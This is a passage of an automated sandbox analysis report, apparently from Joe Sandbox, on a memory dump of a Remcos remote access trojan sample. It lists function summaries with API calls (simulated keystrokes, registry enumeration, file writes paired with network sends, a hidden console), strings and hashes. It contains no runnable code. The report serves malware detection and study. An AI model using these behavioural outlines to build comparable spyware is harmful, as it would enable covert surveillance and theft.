                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00445423
                                                                                                                                                                    • _free.LIBCMT ref: 00445494
                                                                                                                                                                    • _free.LIBCMT ref: 004454AD
                                                                                                                                                                    • _free.LIBCMT ref: 004454DF
                                                                                                                                                                    • _free.LIBCMT ref: 004454E8
                                                                                                                                                                    • _free.LIBCMT ref: 004454F4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                    • String ID: C
                                                                                                                                                                    • API String ID: 1679612858-1037565863
                                                                                                                                                                    • Opcode ID: c1e41a01213cdbac3447a8ba434c9e48cb05e79aac4e6bdd2fadd948f06dfc8d
                                                                                                                                                                    • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                                                                                                                                    • Opcode Fuzzy Hash: c1e41a01213cdbac3447a8ba434c9e48cb05e79aac4e6bdd2fadd948f06dfc8d
                                                                                                                                                                    • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: tcp$udp
                                                                                                                                                                    • API String ID: 0-3725065008
                                                                                                                                                                    • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                                                                                                                    • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                                                                                                                                    • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                                                                                                                    • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                                                    • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                                                                                                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                    • String ID: PkG$XMG$NG$NG
                                                                                                                                                                    • API String ID: 1649129571-3151166067
                                                                                                                                                                    • Opcode ID: 1d3ff612d60dcdc4e0acc893d68db7ccaa0c14c88cd1a80318e69fe49614b045
                                                                                                                                                                    • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d3ff612d60dcdc4e0acc893d68db7ccaa0c14c88cd1a80318e69fe49614b045
                                                                                                                                                                    • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                                                                                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                                                                                                                                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                                                                                                      • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                    • String ID: .part
                                                                                                                                                                    • API String ID: 1303771098-3499674018
                                                                                                                                                                    • Opcode ID: c2b99d59a5a8484969540797bd158b296de259178e7883faaa59f7cabbc877b8
                                                                                                                                                                    • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                                                                                                                                    • Opcode Fuzzy Hash: c2b99d59a5a8484969540797bd158b296de259178e7883faaa59f7cabbc877b8
                                                                                                                                                                    • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041CD9B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                                                                                                                                    • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                                                                                                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Console$Window$AllocOutputShow
                                                                                                                                                                    • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                                                                                                                                                    • API String ID: 4067487056-3065609815
                                                                                                                                                                    • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                                                                                                                    • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                                                                                                                                    • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                                                                                                                    • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                                                                                                                                    • __freea.LIBCMT ref: 0044AE30
                                                                                                                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                                                                    • __freea.LIBCMT ref: 0044AE39
                                                                                                                                                                    • __freea.LIBCMT ref: 0044AE5E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3864826663-0
                                                                                                                                                                    • Opcode ID: 118846f8b98fa7142c6fc34e08ba9c255994cc722e781db25b6080b075eb9fff
                                                                                                                                                                    • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                                                                                                                                    • Opcode Fuzzy Hash: 118846f8b98fa7142c6fc34e08ba9c255994cc722e781db25b6080b075eb9fff
                                                                                                                                                                    • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InputSend
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3431551938-0
                                                                                                                                                                    • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                                                                                                                    • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                                                                                                                                    • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                                                                                                                    • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __freea$__alloca_probe_16_free
                                                                                                                                                                    • String ID: a/p$am/pm$zD
                                                                                                                                                                    • API String ID: 2936374016-2723203690
                                                                                                                                                                    • Opcode ID: 582b27bd1da2528f23ecf4cf811f425633019422103e053086a59298c2d48650
                                                                                                                                                                    • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                                                                                                                                    • Opcode Fuzzy Hash: 582b27bd1da2528f23ecf4cf811f425633019422103e053086a59298c2d48650
                                                                                                                                                                    • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Enum$InfoQueryValue
                                                                                                                                                                    • String ID: [regsplt]$xUG$TG
                                                                                                                                                                    • API String ID: 3554306468-1165877943
                                                                                                                                                                    • Opcode ID: 25d8564f1c9130f63029e5dc48447fb66d54de486441bf10318706b0236fb57d
                                                                                                                                                                    • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                                                                                                                                    • Opcode Fuzzy Hash: 25d8564f1c9130f63029e5dc48447fb66d54de486441bf10318706b0236fb57d
                                                                                                                                                                    • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                                                                                                                                                    • __fassign.LIBCMT ref: 0044B479
                                                                                                                                                                    • __fassign.LIBCMT ref: 0044B494
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                                                                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                    • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                                                                                                                    • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                                                                                                                                    • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                                                                                                                    • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C9492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,274C9C07,?,00000000,?,00000000,00000000), ref: 274C94D4
                                                                                                                                                                    • __fassign.LIBCMT ref: 274C954F
                                                                                                                                                                    • __fassign.LIBCMT ref: 274C956A
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 274C9590
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,274C9C07,00000000,?,?,?,?,?,?,?,?,?,274C9C07,?), ref: 274C95AF
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,274C9C07,00000000,?,?,?,?,?,?,?,?,?,274C9C07,?), ref: 274C95E8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                    • Opcode ID: 36951cc703433c722a8a4544a0facffabfaf8d4f33416ff867a7ba33b2d84b73
                                                                                                                                                                    • Instruction ID: 222d9ad5a9233903a7f1ff3388d0b1562f109d923591ab616fbc3b7cd574b0fe
                                                                                                                                                                    • Opcode Fuzzy Hash: 36951cc703433c722a8a4544a0facffabfaf8d4f33416ff867a7ba33b2d84b73
                                                                                                                                                                    • Instruction Fuzzy Hash: 5351A0B5A00249EFDB00CFA8C895BEEBBF8FF09310F14455EEA55E7281DA749941CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                                                                                                                                                      • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                                                                                                                      • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                    • String ID: xUG$NG$NG$TG
                                                                                                                                                                    • API String ID: 3114080316-2811732169
                                                                                                                                                                    • Opcode ID: 4423c106da275d95852759364254eaaa4f0eff7bf426b0e8c9a14f40a145000e
                                                                                                                                                                    • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                                                                                                                                    • Opcode Fuzzy Hash: 4423c106da275d95852759364254eaaa4f0eff7bf426b0e8c9a14f40a145000e
                                                                                                                                                                    • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C3370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 274C339B
                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 274C33A3
                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 274C3431
                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 274C345C
                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 274C34B1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                    • String ID: csm
                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                    • Opcode ID: 44b2bb140769ba4fbe4a6cfd05107a1ab392470c8c9d5187d1a13f598aaf479f
                                                                                                                                                                    • Instruction ID: 2c898ac8fbb935b4186f30abcfe434350982e4961eeba658f1eb3800452db358
                                                                                                                                                                    • Opcode Fuzzy Hash: 44b2bb140769ba4fbe4a6cfd05107a1ab392470c8c9d5187d1a13f598aaf479f
                                                                                                                                                                    • Instruction Fuzzy Hash: 4041B638A00208DBCB01CF68CC44ADEBBB5AF8522CF14815DD9159B351D7369A15CF9B
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                                                                                                                                                      • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                                                                                                                                      • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
